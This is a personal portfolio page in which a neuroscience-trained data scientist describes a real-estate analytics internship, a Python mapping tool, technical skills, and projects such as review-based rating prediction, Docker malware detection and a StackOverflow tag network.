Initially, as a Neuroscience student, I became interested in the applications of data and technology. This led me to extend my studies to Computer Science with a coursework focused on data-science.
I was a summer intern at StratoDem, a real-estate consulting startup that uses demographic data to build predictive solutions for investors and businesses.
I worked in a team of analysts, utilizing data-mining tools to build predictive models for real estate and government demographic data.
During my stay, I developed Stratplotlib, a python tool that provided the team with an easy way to create maps and visualize their geospatial data.
An example use-case is provided below.
This was my first ecounter with programming in the workplace. As a research assistant, I was responsible to manually analyze videos for neuroscience research. I saw room for improvement and wrote python automations that yielded signficant increases in analysis speed.
Python (pandas, numpy, scikit-learn, scipy, networkX, matplotlib,
seaborn, selenium etc.), SQL, HTML/CSS
Natural Language Processing, stream sampling, search with hashing, principal component analysis and dimensionality reduction
Agile driven development, AWS, webscraping, LaTeX, Linux, Git, Jupyter Notebook
Implemented an efficient way to find duplicate book documents in big volumes of data with the use of locality sensitive hashing and sampling.
Built a model that predicts a user’s rating of a product by analyzing his review and comparing it to ratings of similar reviews. This was done by building a TF-IDF vector for each user’s text and finding its euclidean distance from different clusters.
Worked in a team of engineers to develop a tool that finds suspicious code in docker images. Intended for use in data centers, the tool works by mining security data from containers and then uses similarity matching to find malicious code snippets in the file binaries. (Mentored by IBM)
Built a model that predicts the relationship between two youtube videos (i.e. if they are linked) by analyzing shortest-path metrics in a constructed YouTube graph. Computations were done multi-processed on a remote AWS instance.
Web-scraped all of Boston's hotel reviews in order to build a model of factors that influenced people's ratings.
Implemented a way of predicting user ratings by analysing the number of words with sentiment value in their reviews.
Visualized the relationship of programming tools by constructing a network of “tags” associated with user questions on stackoverflow.com in which a connection defines how often a tag appears with another.
This project was done in order to simplify and understand where technologies fit in the grand scheme of things.
I thought that StackOverflow.com would provide an organic result due to its importance in the tech community.
Making a connection out of 1 post would look something like the above.
With a few million posts, I was able to get a much more descriptive visualization (below).